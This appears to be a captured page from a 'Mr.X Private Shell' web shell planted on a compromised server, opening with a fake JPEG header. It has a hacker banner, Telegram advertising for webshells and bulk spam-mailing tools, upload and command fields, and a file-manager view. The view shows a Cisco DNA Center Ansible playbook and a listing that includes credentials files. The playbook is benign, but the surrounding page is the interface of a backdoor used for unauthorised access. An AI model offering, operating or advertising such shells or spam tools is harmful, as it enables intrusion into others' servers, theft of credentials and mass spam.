����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
- hosts: dnac_servers
  vars_files:
    - credentials.yml
    - device_details.yml
  gather_facts: false
  connection: local
  tasks:
#
# Project Info  Section
#
    - name: Test project template      
      cisco.dnac.template_intent:
        dnac_host: "{{ dnac_host }}"
        dnac_port: "{{ dnac_port }}"
        dnac_username: "{{ dnac_username }}"
        dnac_password: "{{ dnac_password }}"
        dnac_verify: "{{ dnac_verify }}"
        dnac_debug: "{{ dnac_debug }}"
        dnac_log: true
        state: "merged"
        #ignore_errors: true        #Enable this to continue execution even the task fails
        config:
        - projectName: "{{ item.proj_name }}"
          templateContent: "{{ item.device_config }}"
          language: "{{ item.language }}"
          deviceTypes:
          - productFamily: "{{ item.family }}"
          softwareType: "{{ item.type }}"
          softwareVariant: "{{ item.variant }}"
          templateName: "{{ item.temp_name }}"
          versionDescription: "{{ item.description }}"
      register: template_result
      with_items: '{{ template_details }}'
      tags:
        - template


    - name: Create pnp
      cisco.dnac.pnp_intent:
        dnac_host: "{{dnac_host}}"
        dnac_username: "{{dnac_username}}"
        dnac_password: "{{dnac_password}}"
        dnac_verify: "{{dnac_verify}}"
        dnac_port: "{{dnac_port}}"
        dnac_debug: "{{dnac_debug}}"
        dnac_log: true
        config:
        - site_name: "{{ item.site_name }}"
          project_name: "{{ item.proj_name }}"
          template_name: "{{ item.temp_name }}"
          image_name: "{{ item.image_name }}"
          device_version: "{{ item.device_version }}"
          deviceInfo:
            serialNumber: "{{ item.device_number }}"
            hostname: "{{ item.device_name}}"
            state: "{{ item.device_state }}"
            pid: "{{ item.device_id }}"
      register: pnp_result
      with_items: '{{ device_details }}'
      tags:
        - pnp

Filemanager

Name Type Size Permission Actions
files Folder 0755
application_set_info.yml File 522 B 0644
application_sets.yml File 1.36 KB 0644
applications.yml File 2.86 KB 0644
authentication_import.yml File 579 B 0644
command_runner_run_command.yml File 1.2 KB 0644
configuration_template_version_create.yml File 1.65 KB 0644
credentials.template File 150 B 0644
credentials.yml File 148 B 0644
device_details.yml File 1.61 KB 0644
discovery.yml File 4.36 KB 0644
download_device_cmd_runner_output.yml File 2.56 KB 0644
global_credentials.yml File 1.11 KB 0644
global_credentials_info.yml File 1.27 KB 0644
global_pool.yml File 779 B 0644
hosts File 26 B 0644
image_details.yml File 609 B 0644
import_image_file.yml File 684 B 0644
network_device_custom_prompt_info.yml File 655 B 0644
network_device_info.yml File 1.13 KB 0644
network_device_update_role.yml File 1.57 KB 0644
pnp_device.yml File 2.43 KB 0644
reports_executions_info.yml File 681 B 0644
reserve_ip_subpool.yml File 1.34 KB 0644
sda_fabric.yml File 605 B 0644
sda_fabric_site.yml File 1.06 KB 0644
sda_virtual_network_v2.yml File 1.01 KB 0644
tag.yml File 4.06 KB 0644
template.yml File 727 B 0644
template_pnp_intent.yml File 1.96 KB 0644
test_swim_module.yml File 1.33 KB 0644
wireless_enterprise_ssid.yml File 1.14 KB 0644